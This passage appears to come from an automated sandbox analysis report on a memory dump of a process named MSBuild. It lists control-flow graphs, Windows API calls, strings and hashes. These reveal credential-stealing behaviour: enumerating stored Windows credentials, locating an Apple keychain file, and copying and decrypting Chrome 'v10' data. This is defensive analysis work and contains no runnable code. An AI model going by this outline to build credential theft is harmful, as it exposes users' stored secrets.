120 API calls 38258->38289 38261 429a7a 38287 416760 11 API calls 38261->38287 38284 416760 11 API calls 38265->38284 38268 425ad6 38267->38268 38290 415c56 11 API calls 38267->38290 38268->38231 38269->38268 38278 415c56 11 API calls 38269->38278 38272->38269 38281 422640 13 API calls 38272->38281 38282 4226e0 12 API calls 38272->38282 38273->38234 38274->38251 38275->38251 38276->38251 38277->38251 38278->38265 38279->38251 38280->38251 38281->38272 38282->38272 38283->38265 38284->38246 38285->38268 38286->38261 38287->38258 38288->38258 38289->38267 38290->38265 38291->38213 38292->38216 38293->37899 40185 4147f3 40188 414561 40185->40188 40187 414813 40189 41456d 40188->40189 40190 41457f GetPrivateProfileIntW 40188->40190 40193 4143f1 memset _itow WritePrivateProfileStringW 40189->40193 40190->40187 40192 41457a 40192->40187 40193->40192

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                    • API String ID: 708747863-3398334509
                                                                                                                                                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1690352074-0
                                                                                                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                    • API String ID: 2263259095-3798722523
                                                                                                                                                                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                    • API String ID: 4165125987-2783969131
                                                                                                                                                                                    • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
